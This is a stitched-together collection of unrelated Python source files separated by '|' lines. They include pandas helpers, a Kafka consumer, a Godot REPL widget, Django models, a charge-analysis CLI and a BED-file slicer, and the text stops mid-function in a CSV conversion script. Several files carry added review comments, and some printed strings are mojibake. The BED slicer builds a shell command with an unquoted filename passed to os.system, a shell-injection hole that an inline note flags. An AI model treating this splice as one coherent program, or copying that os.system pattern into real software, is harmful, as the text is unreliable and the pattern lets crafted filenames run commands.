_KEY_COL_NAME = "__safe_groupby_key__"
_DEFAULT_DATETIME = datetime(2000, 1, 1)
class PandasUtils(SlideUtils[pd.DataFrame, pd.Series]):
    """A collection of pandas utils"""

    def is_series(self, obj: Any) -> bool:
        # True only for a genuine pandas Series (ndarray/list do not count).
        return isinstance(obj, pd.Series)

    def to_series(self, obj: Any, name: Optional[str] = None) -> pd.Series:
        # Pass a Series through (renaming only if a different name is asked
        # for); wrap ndarray/list into a new Series; reject anything else.
        if self.is_series(obj):
            if name is not None and obj.name != name:
                return obj.rename(name)
            return obj
        if isinstance(obj, (np.ndarray, list)):
            return pd.Series(obj, name=name)
        raise NotImplementedError  # pragma: no cover

    def series_to_array(self, col: pd.Series) -> List[Any]:
        # Plain Python list of the column's values.
        return col.tolist()

    def to_constant_series(
        self,
        constant: Any,
        from_series: pd.Series,
        dtype: Any = None,
        name: Optional[str] = None,
    ) -> pd.Series:
        # Broadcast `constant` over the index of `from_series`.
        return pd.Series(constant, index=from_series.index, dtype=dtype, name=name)

    def cols_to_df(
        self, cols: List[pd.Series], names: Optional[List[str]] = None
    ) -> pd.DataFrame:
        # At least one real series is required so the frame has a usable index.
        assert_or_throw(
            any(self.is_series(s) for s in cols),
            SlideInvalidOperation("at least one value in cols should be series"),
        )
        if names is None:
            return pd.DataFrame({c.name: c for c in cols})
        return pd.DataFrame(dict(zip(names, cols)))

    def as_pandas(self, df: pd.DataFrame) -> pd.DataFrame:
        # Already pandas; identity.
        return df

    def to_schema(self, df: pd.DataFrame) -> pa.Schema:
        # Empty frames carry no inferable dtypes -> defer to the base class.
        if len(df.index) == 0:
            return super().to_schema(df)
        self.ensure_compatible(df)
        assert_or_throw(
            df.columns.dtype == "object",
            ValueError("Pandas dataframe must have named schema"),
        )
        # Normalize every timestamp field to the triad default timestamp type.
        fields: List[pa.Field] = []
        for field in pa.Schema.from_pandas(df, preserve_index=False):
            if pa.types.is_timestamp(field.type):
                fields.append(pa.field(field.name, TRIAD_DEFAULT_TIMESTAMP))
            else:
                fields.append(field)
        return pa.schema(fields)

    def sql_groupby_apply(
        self,
        df: pd.DataFrame,
        cols: List[str],
        func: Callable[[pd.DataFrame], pd.DataFrame],
        output_schema: Optional[pa.Schema] = None,
        **kwargs: Any,
    ) -> pd.DataFrame:
        # NOTE(review): lexicographic string comparison of versions; fine for
        # the pandas 0.x/1.x/2.x timeline but fragile in general.
        if pd.__version__ < "1.2":  # pragma: no cover
            # https://github.com/pandas-dev/pandas/issues/35889
            return self._sql_groupby_apply_older_version(df, cols, func, **kwargs)
        self.ensure_compatible(df)
        if len(cols) == 0:
            # No grouping keys: apply func to the whole frame at once.
            return func(df)
        # dropna=False keeps groups whose key contains null (SQL semantics).
        return (
            df.groupby(cols, dropna=False)
            .apply(lambda tdf: func(tdf.reset_index(drop=True)), **kwargs)
            .reset_index(drop=True)
        )

    def _sql_groupby_apply_older_version(
        self,
        df: pd.DataFrame,
        cols: List[str],
        func: Callable[[pd.DataFrame], pd.DataFrame],
        **kwargs: Any,
    ) -> pd.DataFrame:  # pragma: no cover
        # Emulates groupby(dropna=False) on pandas < 1.2 by grouping on
        # synthetic key columns (a null flag plus a null-filled value per key)
        # so rows with null keys are not silently dropped.
        def _wrapper(keys: List[str], df: pd.DataFrame) -> pd.DataFrame:
            # Strip the synthetic key columns before handing rows to func.
            return func(df.drop(keys, axis=1).reset_index(drop=True))

        def _fillna_default(col: Any) -> Any:
            # Pick a type-appropriate placeholder for nulls in a key column.
            if is_object_dtype(col.dtype):
                return col.fillna(0)
            ptype = self.to_safe_pa_type(col.dtype)
            if pa.types.is_timestamp(ptype) or pa.types.is_date(ptype):
                return col.fillna(_DEFAULT_DATETIME)
            if pa.types.is_string(ptype):  # pragma: no cover
                return col.fillna("")
            if pa.types.is_boolean(ptype):
                return col.fillna(False)
            return col.fillna(0)

        self.ensure_compatible(df)
        if len(cols) == 0:
            return func(df)
        params: Dict[str, Any] = {}
        for c in cols:
            params[_KEY_COL_NAME + "null_" + c] = df[c].isnull()
            params[_KEY_COL_NAME + "fill_" + c] = _fillna_default(df[c])
        keys = list(params.keys())
        gdf = df.assign(**params)
        return (
            gdf.groupby(keys)
            .apply(lambda df: _wrapper(keys, df), **kwargs)
            .reset_index(drop=True)
        )
|
# -*- coding:utf-8 -*-
# author: Anson
# @Time : 2020/9/21 14:40
# @File : settings.py
from __future__ import unicode_literals
from kafka import KafkaConsumer
from conf.settings import SERVER_IP, TOPIC, AUTO_OFFSET_RESET, CONSUMER_GROUP, API_VERSION
class KafkaConsumerModule(object):
    """Thin wrapper around kafka-python's KafkaConsumer.

    Builds a consumer subscribed to ``topic``.  Auto-commit is disabled and
    nothing in this class commits offsets — NOTE(review): confirm that
    re-reading messages on restart is intended.
    """

    def __init__(self, bootstrap_servers, auto_offset_reset, topic, group_id, api_version):
        # Keep the raw connection/subscription parameters for introspection.
        self.bootstrap_servers = bootstrap_servers
        self.auto_offset_reset = auto_offset_reset
        self.topic = topic
        self.group_id = group_id
        self.api_version = api_version
        self.consumer = KafkaConsumer(
            self.topic,
            bootstrap_servers=self.bootstrap_servers,
            auto_offset_reset=self.auto_offset_reset,
            group_id=self.group_id,
            # heartbeat must be well below the session timeout (6s / 2s here).
            session_timeout_ms=6000,
            heartbeat_interval_ms=2000,
            api_version=self.api_version,
            enable_auto_commit=False
        )

    def print_message(self):
        """Block forever, printing each consumed message value with a counter."""
        messages = self.consumer
        count = 0
        for message in messages:
            # Original (mojibake) text: "consuming message #<count>".
            print('ๆถ่ดนๆฐๆฎ็ฌฌ{0}ๆก'.format(count))
            print(message.value)
            count += 1
def main():
    """Entry point: build a consumer from conf.settings and print messages forever."""
    print('-' * 20)
    # Fix: the original source contained a raw newline inside this
    # single-quoted string literal, which is a SyntaxError in Python.
    # The banner text itself is mojibake (likely a GBK/UTF-8 mix-up of
    # "consumer") — TODO confirm the intended text.
    print('ๆถ่ดน่')
    print('-' * 20)
    consumer = KafkaConsumerModule(SERVER_IP, AUTO_OFFSET_RESET, TOPIC, CONSUMER_GROUP, API_VERSION)
    consumer.print_message()


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making ่้ฒธๆบไบPaaSๅนณๅฐ็คพๅบ็ (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2019 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import importlib
import logging
import traceback
from pipeline.contrib.external_plugins.models import source_cls_factory
from pipeline.contrib.external_plugins.utils.importer import importer_context
logger = logging.getLogger("root")
def load_external_modules():
    """Import every module declared by each registered external plugin source.

    Iterates all source models in the factory, fetches their configured
    sources from the database and imports each source's modules.
    """
    # Fix: the old loop unpacked (source_type, source_model_cls) from
    # list(items()) but never used source_type; iterate the values directly
    # and drop the unnecessary list materialization.
    for source_model_cls in source_cls_factory.values():
        # get all external source
        sources = source_model_cls.objects.all()
        # get importer for source
        for source in sources:
            _import_modules_in_source(source)
def _import_modules_in_source(source):
    """Import all modules of one external source inside its importer context.

    Errors are logged (with traceback) and swallowed so one broken source
    cannot prevent the remaining sources from loading.
    """
    try:
        importer = source.importer()
        with importer_context(importer):
            for mod in source.modules:
                importlib.import_module(mod)
    except Exception:
        # The doubled braces render literal {} around the source name.
        logger.error("An error occurred when loading {{{}}}: {}".format(source.name, traceback.format_exc()))
|
# ---------------------------------------------------------------------
# Linux.Debian.get_capabilities
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.sa.profiles.Generic.get_capabilities import Script as BaseScript
from noc.sa.profiles.Generic.get_capabilities import false_on_cli_error
class Script(BaseScript):
    """Capability detection for Debian-based Linux boxes (LLDP/CDP daemons)."""
    name = "Linux.Debian.get_capabilities"

    @false_on_cli_error
    def has_lldp_cli(self):
        """
        Check box has lldp/ladvd daemon enabled
        """
        # The [l] bracket trick keeps grep from matching its own process line.
        r1 = self.cli("/bin/ps aux | grep [l]advd")
        r2 = self.cli("/bin/ps aux | grep [l]ldpd")
        # Idiom fix: collapse `if ...: return True / else: return False`.
        return bool(r1 or r2)

    @false_on_cli_error
    def has_cdp_cli(self):
        """
        Check box has cdp enabled
        """
        # Ladvd daemon always listens for CDP.
        r1 = self.cli("/bin/ps aux | grep [l]advd")
        # For lldpd, CDP must be enabled in config: LLDPD_OPTIONS="-c"
        # in /etc/sysconfig/lldpd.
        r2 = self.cli('/bin/ps aux | grep "[/]usr/sbin/lldpd -c"')
        return bool(r1 or r2)
|
import sys
import code
from godot import exposed, export
from godot import *
from .plugin import BASE_RES
FONT = ResourceLoader.load(f"{BASE_RES}/hack_regular.tres")
@exposed(tool=True)
class PythonREPL(VBoxContainer):
    """Editor-embedded Python REPL.

    Wires the scene's buttons and input box to a ``code.InteractiveConsole``
    and mirrors captured stdout into the output box.
    """

    def _enter_tree(self):
        # Command history and navigation cursor (0 == "past the newest entry";
        # negative values index back from the end of self.history).
        self.history = []
        self.selected_history = 0
        self.output_box = self.get_node("OutputBox")
        self.output_box.add_font_override("normal_font", FONT)
        self.output_box.add_font_override("mono_font", FONT)
        self.run_button = self.get_node("FooterContainer/RunButton")
        self.copy_button = self.get_node("HeaderContainer/CopyButton")
        self.copy_button.connect("pressed", self, "copy")
        self.clear_button = self.get_node("HeaderContainer/ClearButton")
        self.clear_button.connect("pressed", self, "clear")
        self.input_box = self.get_node("FooterContainer/InputBox")
        self.input_box.connect("text_entered", self, "execute")
        self.run_button.connect("pressed", self, "execute")
        # Fresh interpreter namespace, like a bare interactive `python` session.
        self.interpreter_context = {"__name__": "__console__", "__doc__": None}
        self.interpreter = code.InteractiveConsole(self.interpreter_context)
        # True while the console is waiting for more lines of a compound statement.
        self.more = False
        # Mirror captured stdout into the output box when the plugin's IO
        # stream capture is enabled (then sys.stdout exposes add_callback).
        if getattr(sys.stdout, "add_callback", None) is not None:
            sys.stdout.add_callback(self.output_line)
            # sys.stderr.add_callback(self.output_line)
        else:
            self.output_line("It seems IO Streams Capture is disabled.")
            self.output_line("In order to see the output of commands, go to:")
            self.output_line("Project > Project Settings > Python Script > Io Streams Capture")
            self.output_line("and enable Io Streams Capture.")

    def _exit_tree(self):
        # Detach the stdout mirror registered in _enter_tree (if any).
        if getattr(sys.stdout, "remove_callback", None) is not None:
            sys.stdout.remove_callback(self.output_line)
            # sys.stderr.remove_callback(self.output_line)

    def _ready(self):
        pass

    def output_line(self, line):
        """Append one line of monospace text to the output box."""
        self.output_box.push_mono()
        self.output_box.add_text(line)
        self.output_box.newline()
        self.output_box.pop()

    def remove_last_line(self):
        # Drop the last visible line and keep the view scrolled to the bottom.
        self.output_box.remove_line(self.output_box.get_line_count() - 2)
        self.output_box.scroll_to_line(self.output_box.get_line_count() - 1)

    def execute(self, *args, **kwargs):
        """Echo the input-box text with a prompt and push it to the console."""
        string = self.input_box.get_text()
        # avoid adding multiple repeated entries to the command history
        if not (len(self.history) > 0 and self.history[-1] == string):
            self.history.append(string)
        self.selected_history = 0
        self.input_box.clear()
        # Prompt mirrors CPython: "... " while a compound statement is open.
        linestart = "... " if self.more else ">>> "
        self.output_line(linestart + str(string))
        # push() returns True when more input is required to complete the statement.
        self.more = self.interpreter.push(str(string))

    def up_pressed(self):
        # Step backwards through history (selected_history goes more negative).
        # NOTE(review): the `>= abs(selected_history - 1)` bound looks like it
        # may allow stepping exactly to the oldest entry but not past it -- confirm.
        if len(self.history) >= abs(self.selected_history - 1):
            self.selected_history -= 1
            self.input_box.clear()
            self.input_box.set_text(self.history[self.selected_history])
            self.input_box.grab_focus()

    def down_pressed(self):
        # Step forwards; reaching 0 means "past the newest entry" -> clear input.
        if self.selected_history + 1 == 0:
            self.selected_history += 1
            self.input_box.clear()
        elif self.selected_history + 1 < 0:
            self.selected_history += 1
            self.input_box.clear()
            self.input_box.set_text(self.history[self.selected_history])
            self.input_box.grab_focus()

    def copy(self):
        pass

    def clear(self):
        self.output_box.clear()
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, PermissionsMixin
# User Manager
class UserManager(BaseUserManager):
    """Manager that creates regular users and superusers for the custom User model."""

    def create_user(self, username, email, password=None, **kwargs):
        """Create and return a `User` with an email, phone number, username and password.

        Extra keyword arguments (e.g. ``name``, ``phone``) are forwarded to the
        model constructor.
        """
        if username is None:
            raise TypeError('Users must have a username.')
        if email is None:
            raise TypeError('Users must have an email.')
        # BUG FIX: **kwargs were accepted but silently dropped; forward them so
        # extra model fields (name, phone, ...) are actually stored.
        user = self.model(username=username, email=self.normalize_email(email),
                          **kwargs)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_superuser(self, username, email, password):
        """
        Create and return a `User` with superuser (admin) permissions.
        """
        if password is None:
            raise TypeError('Superusers must have a password.')
        if email is None:
            raise TypeError('Superusers must have an email.')
        if username is None:
            # Message fix: "an username" -> "a username".
            raise TypeError('Superusers must have a username.')
        user = self.create_user(username, email, password)
        user.is_superuser = True
        user.is_staff = True
        user.save(using=self._db)
        return user
# Repository Django model
class Repository(models.Model):
    """A repository card: title, short description and popularity counters."""
    title = models.CharField("Title", max_length=50)
    about = models.CharField("About", max_length=300)
    stars = models.IntegerField()
    watching = models.IntegerField()
    forks = models.IntegerField()
# User Django model
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user that logs in by email (USERNAME_FIELD) with a unique username.

    PermissionsMixin supplies ``is_superuser`` plus the groups/permissions
    relations that ``UserManager.create_superuser`` relies on (it was imported
    but never used before).
    """
    # BUG FIX: removed `default=False` -- a boolean default on a CharField.
    username = models.CharField(db_index=True, max_length=255, unique=True)
    name = models.CharField("First and Last name", max_length=255)
    # NOTE(review): USERNAME_FIELD is 'email' yet email allows null/blank --
    # a user without an email cannot authenticate; consider making it required.
    email = models.EmailField(db_index=True, unique=True, null=True, blank=True)
    phone = models.CharField(max_length=20)
    repositories = models.ManyToManyField(Repository)
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = ['username']
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    objects = UserManager()

    def __str__(self):
        return f"{self.username}"
|
from corehq.apps.groups.models import Group
from corehq.apps.reports.daterange import get_simple_dateranges
from dimagi.ext.couchdbkit import *
from dimagi.utils.decorators.memoized import memoized
DAILY = "daily"
WEEKLY = "weekly"
MONTHLY = "monthly"
DEFAULT_HOUR = 8
DEFAULT_WEEK_DAY = 1
DEFAULT_MONTH_DAY = 1
SCHEDULE_CHOICES = [DAILY, WEEKLY, MONTHLY]
class ScheduleConfiguration(DocumentSchema):
    """When a scheduled report fires: daily/weekly/monthly plus hour/day fields."""
    interval = StringProperty(choices=SCHEDULE_CHOICES)  # daily / weekly / monthly
    hour = IntegerProperty(default=DEFAULT_HOUR)
    day_of_week = IntegerProperty(default=DEFAULT_WEEK_DAY)  # same as cron, 1 = Monday (0 and 7 = Sunday)
    day_of_month = IntegerProperty(default=DEFAULT_MONTH_DAY)
class TemplateVariable(DocumentSchema):
    """A substitutable variable in a performance-report template."""
    slug = StringProperty(required=True, default='forms')
    type = StringProperty(required=True, choices=['form'])  # todo: can extend to cases
    time_range = StringProperty(choices=[choice.slug for choice in get_simple_dateranges()])
    # Either the case type or the form xmlns that this template variable is based on.
    source_id = StringProperty()
    # The app that the form belongs to - not currently used, but could be used in the future to prevent
    # duplicate XMLNSes in the same project
    app_id = StringProperty()
class PerformanceConfiguration(Document):
    """A scheduled performance report: recipient group, schedule and template."""
    domain = StringProperty(required=True)
    recipient_id = StringProperty(required=True)  # an ID of a Group
    schedule = SchemaProperty(ScheduleConfiguration)
    template_variables = SchemaListProperty(TemplateVariable)
    template = StringProperty(required=True)

    @property
    @memoized
    def group(self):
        """Fetch the recipient Group, asserting it belongs to this domain."""
        group = Group.get(self.recipient_id)
        assert group.domain == self.domain
        return group
|
from django.contrib.auth.models import User
from django.core.validators import MinValueValidator
from django.db import models
from django.db.models import Sum
from contest.models import Contest
class Language(models.Model):
    """A judge0-backed language with its per-submission resource limits."""
    id = models.AutoField(primary_key=True)
    name = models.CharField(max_length=20)
    judge0_lang_id = models.CharField(max_length=3)  # language id as known to judge0
    monaco_lang_code = models.CharField(max_length=20, default='cpp')  # Monaco editor highlighting id
    stack_limit = models.IntegerField(default=2048)
    cpu_time_limit = models.IntegerField(default=2)
    # mem_limit should be >= 2048 as expected by judge0
    mem_limit = models.IntegerField(validators=[MinValueValidator(2048)],
                                    default=2048)
    filesize_limit = models.IntegerField(default=1024)
    process_limit = models.IntegerField(default=50)
    wall_time_limit = models.IntegerField(default=3)

    def __str__(self):
        return "{} - ID{}".format(self.name, self.id)
class UserContest(models.Model):
    """A user's participation in a contest, with aggregated score/penalty."""
    STATUSES = [
        ('REGISTERED', 'REGISTERED'),
        ('STARTED', 'STARTED'),
        ('ENDED', 'ENDED')
    ]
    contest_id = models.ForeignKey(Contest, on_delete=models.CASCADE,
                                   related_name='user_contests')
    user_id = models.ForeignKey(User, on_delete=models.CASCADE)
    status = models.CharField(max_length=20, choices=STATUSES,
                              default='REGISTERED')

    @property
    def total_score(self):
        """Sum of scores over this participation's UserQuestion rows (0.0 if none)."""
        user_ques = UserQuestion.objects.filter(user_contest=self)
        total_sum = user_ques.aggregate(Sum('score'))
        # aggregate returns None when there are no rows; coerce to 0.0.
        return total_sum['score__sum'] or 0.0

    @property
    def total_penalty(self):
        """Sum of penalties over this participation's UserQuestion rows (0.0 if none)."""
        user_ques = UserQuestion.objects.filter(user_contest=self)
        total_sum = user_ques.aggregate(Sum('penalty'))
        return total_sum['penalty__sum'] or 0.0

    class Meta:
        indexes = [
            models.Index(fields=['contest_id', 'user_id', ]),
        ]

    def __str__(self):
        return "{}-{}".format(self.contest_id.name, self.user_id.username)
class UserQuestion(models.Model):
    """Per-question score and penalty within one user's contest participation."""
    que = models.ForeignKey(to='question.Question', on_delete=models.CASCADE,
                            null=True)
    user_contest = models.ForeignKey(UserContest, on_delete=models.CASCADE,
                                     related_name='questions')
    penalty = models.FloatField(default=0)
    score = models.FloatField(default=0)

    class Meta:
        # At most one row per (participation, question) pair.
        unique_together = ['user_contest', 'que']
|
import argparse
import os
from . import transition_analysis_utils as tau
from . import vtk_output_utils as vtk_out
def main():
    """CLI driver for Voronoi-segmentation based hole/particle transition analysis.

    Reads transitions listed in ``<input_dir>/metadata.csv``, computes atomic
    charges via a Voronoi segmentation, and writes the requested outputs
    (atomic/subgroup charges, transition diagrams, VTK models) under
    ``<input_dir>/results/``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("input_dir",
                        type=str,
                        help="The directory containing the input cube files for transitions. "
                        "The directory should a 'metadata.csv' file which contains 3 columns. "
                        "The first specifies the name of the transition. The second and third "
                        "columns specify hole and particle cube files respectively.")
    parser.add_argument("-p", "--different_atom_pos",
                        default=False,
                        action='store_true',
                        help="If specified, Voronoi diagram will be computed for each cube "
                        "file separately. By default it is assumed, the atomic positions remain "
                        "the same for all the cube files.")
    parser.add_argument("-q", "--use_quadratic_optimization",
                        default=False,
                        action='store_true',
                        help="Use quadratic programming based optimization approach to compute "
                        "the charge trasfer between subgroups. By default a hueristic approach "
                        "is used for this purpose.")
    parser.add_argument("-d", "--output_transition_diagram",
                        default=False,
                        action='store_true',
                        help="If specified, transition diagram will be generated for all the "
                        "transitions in '<input_dir>/results/transition_diagrams/' directory.")
    parser.add_argument("-a", "--output_atomic_charges",
                        default=False,
                        action='store_true',
                        help="If specified, atomic charges for each transition will be output"
                        " as a csv file in the directory '<input_dir>/results/atomic_charges/'.")
    parser.add_argument("-s", "--output_subgroup_charges",
                        default=False,
                        action='store_true',
                        help="If this option is set, subgroup charges and amount of charge "
                        "transfer for each transition would be output in a directory named "
                        "'<input_dir>/results/subgroup_charges/'.")
    parser.add_argument("-av", "--output_atoms_vtk",
                        default=False,
                        action='store_true',
                        help="If this option is set, the atoms are saved as 3D model in VTK format. "
                        "A file is generated for each transition which contains the data about "
                        "the hole and particle charge, charge difference, subgroup, etc. "
                        "These VTK files are saved in '<input_dir>/results/vtk/atoms/' and "
                        "can be loaded in VTK compatible software like Paraview.")
    parser.add_argument("-sv", "--output_segmentation_vtk",
                        default=False,
                        action='store_true',
                        help="If specified, the computed Voronoi segmentation at atomic and "
                        "subgroup scales are saved as VTK compatible files in the directory "
                        "'<input_dir>/results/vtk/segmentation/'. These files can be loaded in "
                        "VTK compatible software like Paraview.")
    parser.add_argument("-t", "--threads",
                        type=int,
                        default=4,
                        help="Specify the number of parallel threads to be used in "
                        "computing the Voronoi diagram. By default four threads are used.")
    args = parser.parse_args()
    # NOTE(review): paths are built by string concatenation, so input_dir is
    # assumed to end with '/'; consider os.path.join.
    input_dir = args.input_dir
    different_atom_pos = args.different_atom_pos
    use_quadratic_optimization = args.use_quadratic_optimization
    threads = args.threads
    output_transition_diagram = args.output_transition_diagram
    output_atomic_charges = args.output_atomic_charges
    output_subgroup_charges = args.output_subgroup_charges
    output_atoms_vtk = args.output_atoms_vtk
    output_segmentation_vtk = args.output_segmentation_vtk
    if not os.path.isdir(input_dir):
        print("Can't find the specified input directory. Exiting ...")
        exit(1)  # BUG FIX: error paths previously exited with status 0
    metadata_file = input_dir + "metadata.csv"
    if not os.path.isfile(metadata_file):
        print("Can't find metadata.csv file in the directory. Exiting ...")
        exit(1)
    state_files = tau.read_metadata_file(metadata_file)
    if not state_files:
        print("No cube files specified in the metadata.csv file. Exiting ...")
        exit(1)
    # Create the results directory tree for every requested output kind.
    output_dir = input_dir + "results/"
    if not os.path.isdir(output_dir):
        print("Creating the output directory: %s" % output_dir)
        os.makedirs(os.path.dirname(output_dir))
    if output_atomic_charges:
        output_dir = input_dir + "results/atomic_charges/"
        if not os.path.isdir(output_dir):
            print("Creating the output directory for atomic charges: %s" %
                  output_dir)
            os.makedirs(os.path.dirname(output_dir))
    if output_subgroup_charges:
        output_dir = input_dir + "results/subgroup_charges/"
        if not os.path.isdir(output_dir):
            print("Creating the output directory for subgroup charges: %s" %
                  output_dir)
            os.makedirs(os.path.dirname(output_dir))
    if output_transition_diagram:
        output_dir = input_dir + "results/transition_diagrams/"
        if not os.path.isdir(output_dir):
            print("Creating the output directory for transition diagrams: %s" %
                  output_dir)
            os.makedirs(os.path.dirname(output_dir))
    if output_atoms_vtk:
        output_dir = input_dir + "results/vtk/atoms/"
        if not os.path.isdir(output_dir):
            print("Creating the output directory for atomic charges: %s" %
                  output_dir)
            os.makedirs(os.path.dirname(output_dir))
    # Load every hole/particle cube-file pair listed in metadata.csv.
    transitions = []
    transition_names = []
    for state_file in state_files:
        hole_cubeFile = input_dir + state_file[1]
        particle_cubeFile = input_dir + state_file[2]
        transition = tau.load_transition(hole_cubeFile, particle_cubeFile)
        transitions.append(transition)
        transition_names.append(state_file[0])
    print("Loaded the hole and particle cube files ...")
    segment_arrays = tau.compute_atomic_charges(
        transitions, num_threads=threads, same_atomic_positions=not different_atom_pos,
        save_segmention=output_segmentation_vtk)
    # Typo fix in user message: "Compted" -> "Computed".
    print("Computed the Voronoi diagram based segmentation and atomic charges ...")
    subgroup_file = input_dir + "subgroups.txt"
    # BUG FIX: previously this tested `metadata_file` (always present at this
    # point), so a missing subgroups.txt crashed load_subgroups instead of
    # degrading gracefully to the no-subgroup path below.
    if os.path.isfile(subgroup_file):
        subgroup_names, atom_subgroup_map = tau.load_subgroups(
            subgroup_file)
    else:
        if output_subgroup_charges or output_transition_diagram:
            print("Can't find subgroups.txt file in the input directory. "
                  "The subgroup charges and transition diagrams will not be computed.")
            output_subgroup_charges = output_transition_diagram = False
        subgroup_names = []
        atom_subgroup_map = [0] * transitions[0].num_atoms()
    # Emit the per-transition outputs that were requested.
    for i in range(len(transitions)):
        transition = transitions[i]
        if output_atomic_charges:
            output_file = input_dir + "results/atomic_charges/" + \
                "%s.csv" % transition_names[i]
            tau.save_atomic_charges(
                output_file, transition.hole_data.atoms, transition.hole_charges,
                transition.particle_charges, subgroup_names, atom_subgroup_map)
        if output_atoms_vtk:
            output_file = input_dir + "results/vtk/atoms/" + \
                "%s.vtp" % transition_names[i]
            vtk_out.write_atoms(output_file, transition.hole_data.atoms,
                                transition.hole_charges, transition.particle_charges, atom_subgroup_map)
        if output_subgroup_charges or output_transition_diagram:
            subgroup_info = tau.SubgroupInfo()
            subgroup_info.set_subgroups(subgroup_names, atom_subgroup_map)
            tau.compute_subgroup_charges(transition, subgroup_info, use_hueristic=not use_quadratic_optimization)
            if output_subgroup_charges:
                output_file = input_dir + "results/subgroup_charges/" + \
                    "%s.txt" % transition_names[i]
                subgroup_info.save_to_file(output_file)
            if output_transition_diagram:
                output_file = input_dir + "results/transition_diagrams/" + \
                    "%s.png" % transition_names[i]
                tau.create_diagram(
                    subgroup_info, title=transition_names[i], show_plot=False, save_plot=True, file_name=output_file)
    if output_segmentation_vtk:
        output_dir = input_dir + "results/vtk/segmentation/"
        if not os.path.isdir(output_dir):
            os.makedirs(os.path.dirname(output_dir))
        if different_atom_pos:
            # One segmentation per cube file: hole at 2*i, particle at 2*i+1.
            for i in range(len(transitions)):
                data = transitions[i].hole_data
                vtk_out.write_segments(output_dir + "%s_hole_seg_atoms.vtp" %
                                       transition_names[i], segment_arrays[2 * i], data.basis, data.atoms)
                if output_subgroup_charges or output_transition_diagram:
                    vtk_out.write_subgroup_segments(
                        output_dir +
                        "%s_hole_seg_subgroups.vtp" % transition_names[i],
                        segment_arrays[2 * i], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
                data = transitions[i].particle_data
                vtk_out.write_segments(output_dir + "%s_particle_seg_atoms.vtp" %
                                       transition_names[i], segment_arrays[2 * i + 1], data.basis, data.atoms)
                if output_subgroup_charges or output_transition_diagram:
                    vtk_out.write_subgroup_segments(
                        output_dir +
                        "%s_particle_seg_subgroups.vtp" % transition_names[i],
                        segment_arrays[2 * i + 1], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
        else:
            # Shared atomic positions: a single segmentation covers all transitions.
            data = transitions[0].hole_data
            vtk_out.write_segments(
                output_dir + "seg_atoms.vtp", segment_arrays[0], data.basis, data.atoms)
            if output_subgroup_charges or output_transition_diagram:
                vtk_out.write_subgroup_segments(
                    output_dir + "seg_subgroups.vtp", segment_arrays[0], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
# Run the analysis only when executed as a script (not on import).
if __name__ == "__main__":
    main()
|
#!/usr/bin/env python
import os
import bed
import sys
import argparse
# Slice a BED file into score-ordered pieces and print one requested slice.
parser = argparse.ArgumentParser(description='slice bed based on the score order')
parser.add_argument('-i', required= True, help='<Required> input')
parser.add_argument('-n', required= False, default=4, type=int, help='total n pieces (default: 4)')
parser.add_argument('-slice', required= True, type=int, help='slice number from big to small')
args = parser.parse_args()
bedFile = args.i
totalPieces = args.n
sliceNum = args.slice
# Total number of records in the BED file (via the project-local bed module).
totalHitNumber = bed.bed(bedFile).getHitNum()
# Pipeline: sort descending by score (column 5), keep the rows whose rank
# falls inside the requested slice window with awk, then re-sort by coordinates.
# NOTE(review): bedFile is interpolated unquoted into a shell command --
# filenames containing spaces or shell metacharacters will break or inject;
# consider subprocess.run with a list plus shlex.quote.  Also note
# `totalHitNumber/totalPieces` relies on Python 3 true division; under
# Python 2 it would truncate before float() is applied.
code = 'sort -r -k5,5n ' + bedFile + ' | awk "NR>=' + str((sliceNum-1)*float(totalHitNumber/totalPieces)) +' && NR<' + str(sliceNum*float(totalHitNumber/totalPieces)) + '" | sort -k1,1 -k2,2n -k3,3n'
# print(code)
os.system(code)
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import json
import re
import random
import argparse
import os
def main() -> None:
    """Entrypoint of Program Run as Module"""
    # Intentionally a stub: all work currently happens in the __main__ block.
    ...
def read_args():
    """Parse CLI arguments and resolve the input CSV path.

    Falls back to the default dataset, then interactively offers the .csv
    files found in ``<dir>/data`` when the requested file is missing.
    Uses the module-level ``dir`` global set in the ``__main__`` block.

    Returns a dict with file paths, column names and option flags.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument( "node_col_name_1", type=str, help="column name of input file to be represented as node (first of two inputs)")
    parser.add_argument( "edge_col_name", type=str, help="column name of input file to be represented as edges (first of one input)")
    parser.add_argument( "node_col_name_2", type=str, help="column name of input file to be represented as node (second of two inputs)")
    parser.add_argument("-i", "--input_filename", type=str, help=".csv input filepath to translate into VOSviewer triplets")
    parser.add_argument("-c", "--context_col_name", type=str, default="texts", help="column file to be represented as context")
    parser.add_argument("-v", "--verbosity", action="count", default=0)
    parser.add_argument("-o", "--output", type=str, default=os.path.join(dir, 'output', 'output.json'), help="argument for specifying output filepath location")
    parser.add_argument("-f", "--include_formatted_html", action="count", default=0, help="argument to determine if metadata should be included & description formatted specific to Discrimination Triplets")
    args = parser.parse_args()
    if args.input_filename is None:  # idiom: `is None`, not `== None`
        default_path = os.path.join(dir, 'data', 'antisemitism_discrimination_triplets.csv')
        print("No explicitly specified input filepath. Using default input filepath: " + default_path)
        args.input_filename = default_path
    if not os.path.exists(args.input_filename):  # specified or default filepath does not exist
        print("Filepath not found.")
        potential_files = os.listdir(os.path.join(dir, 'data'))
        csv_files = [f for f in potential_files if f.endswith('.csv')]
        print("Searching through data directory for valid input file...")
        # BUG FIX: `len(csv_files) >= 0` was always true, making the
        # "no candidate files" branch unreachable.
        if csv_files:
            found_file = False
            for input_filepath in csv_files:
